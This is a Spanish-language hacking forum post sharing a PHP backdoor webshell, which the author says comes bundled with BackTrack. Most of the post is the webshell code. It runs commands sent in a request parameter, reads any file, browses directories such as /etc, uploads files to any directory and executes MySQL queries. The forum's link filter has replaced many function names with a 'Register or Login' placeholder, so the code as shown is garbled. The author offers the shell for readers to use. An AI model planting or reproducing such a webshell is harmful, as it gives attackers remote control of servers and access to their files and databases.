comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Php-backdoor [Incluido en BackTrack]

  • 0 Respuestas
  • 899 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado 2Fac3R

  • *
  • Underc0der
  • Mensajes: 232
  • Actividad:
    5%
  • Reputación 0
  • Why be a king, when you can be a god
    • Ver Perfil
    • Escuela de Hackers & Programación
  • Skype: rockeg_18
  • Twitter: @2Fac3R
« en: Diciembre 28, 2012, 02:32:38 am »
Últimamente me he dedicado a estudiar algunas webshells en mis tiempos libres y me encontré con esta que es bastante simple y útil, viene entre las herramientas de backtrack con muchas otras más en javascript entre otras cosas.

Código: PHP
  1. <?php
  2. // a simple php backdoor | coded by z0mbie [30.08.03] | http://freenet.am/~zombie \\
  3.  
  4. You are not allowed to view links. Register or Login();
  5. if(You are not allowed to view links. Register or Login($_REQUEST['f'])){
  6.         $filename=$_REQUEST['f'];
  7.         $file=You are not allowed to view links. Register or Login("$filename","rb");
  8.         You are not allowed to view links. Register or Login($file);
  9.         You are not allowed to view links. Register or Login;
  10. }
  11. if(You are not allowed to view links. Register or Login($_REQUEST['d'])){
  12.         $d=$_REQUEST['d'];
  13.         echo "<pre>";
  14.         if ($handle = You are not allowed to view links. Register or Login("$d")) {
  15.         echo "<h2>listing of $d</h2>";
  16.                    while ($dir = You are not allowed to view links. Register or Login($handle)){
  17.                        if (You are not allowed to view links. Register or Login("$d/$dir")) echo "<a href='$PHP_SELF?d=$d/$dir'><font color=grey>";
  18.                             else echo "<a href='$PHP_SELF?f=$d/$dir'><font color=black>";
  19.                        echo "$dir\n";
  20.                        echo "</font></a>";
  21.                 }
  22.                        
  23.         } else echo "opendir() failed";
  24.         You are not allowed to view links. Register or Login($handle);
  25.         You are not allowed to view links. Register or Login ("<hr>");
  26. }
  27. if(You are not allowed to view links. Register or Login($_REQUEST['c'])){
  28.     echo "<pre>";
  29.     You are not allowed to view links. Register or Login($_REQUEST['c']);          
  30.     You are not allowed to view links. Register or Login;
  31. }
  32. if(You are not allowed to view links. Register or Login($_REQUEST['upload'])){
  33.  
  34.         if(!You are not allowed to view links. Register or Login($_REQUEST['dir'])) You are not allowed to view links. Register or Login('hey,specify directory!');
  35.             else $dir=$_REQUEST['dir'];
  36.         $fname=$HTTP_POST_FILES['file_name']['name'];
  37.         if(!You are not allowed to view links. Register or Login($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fname))
  38.             You are not allowed to view links. Register or Login('file uploading error.');
  39. }
  40. if(You are not allowed to view links. Register or Login($_REQUEST['mquery'])){
  41.    
  42.     $host=$_REQUEST['host'];
  43.     $usr=$_REQUEST['usr'];
  44.     $passwd=$_REQUEST['passwd'];
  45.     $db=$_REQUEST['db'];
  46.     $mquery=$_REQUEST['mquery'];
  47.     You are not allowed to view links. Register or Login("$host", "$usr", "$passwd") or
  48.     You are not allowed to view links. Register or Login("Could not connect: " . You are not allowed to view links. Register or Login());
  49.     You are not allowed to view links. Register or Login("$db");
  50.     $result = You are not allowed to view links. Register or Login("$mquery");
  51.     if($result!=FALSE) echo "<pre><h2>query was executed correctly</h2>\n";
  52.     while ($row = You are not allowed to view links. Register or Login($result,MYSQL_ASSOC)) You are not allowed to view links. Register or Login($row);  
  53.     You are not allowed to view links. Register or Login($result);
  54.     You are not allowed to view links. Register or Login;
  55. }
  56. ?>
  57. <pre><form action="<? echo $PHP_SELF; ?>" METHOD=GET >execute command: <input type="text" name="c"><input type="submit" value="go"><hr></form>
  58. <form enctype="multipart/form-data" action="<?php echo $PHP_SELF; ?>" method="post"><input type="hidden" name="MAX_FILE_SIZE" value="1000000000">
  59. upload file:<input name="file_name" type="file">   to dir: <input type="text" name="dir">&nbsp;&nbsp;<input type="submit" name="upload" value="upload"></form>
  60. <hr>to browse go to http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=[directory here]
  61. <br>for example:
  62. http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=/etc on *nix
  63. or http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=c:/windows on win
  64. <hr>execute mysql query:
  65. <form action="<? echo $PHP_SELF; ?>" METHOD=GET >
  66. host:<input type="text" name="host"value="localhost">  user: <input type="text" name="usr" value=root> password: <input type="text" name="passwd">
  67.  
  68. database: <input type="text" name="db">  query: <input type="text" name="mquery"> <input type="submit" value="execute">
  69. </form>
  70.  
  71. <!--    http://michaeldaw.org    2006     -->
  72.  
Espero les sea de utilidad.
Zalu2
« Última modificación: Marzo 22, 2014, 01:57:13 pm por Expermicid »
Escuela de Hackers & Programación.
You are not allowed to view links. Register or Login

 

¿Te gustó el post? COMPARTILO!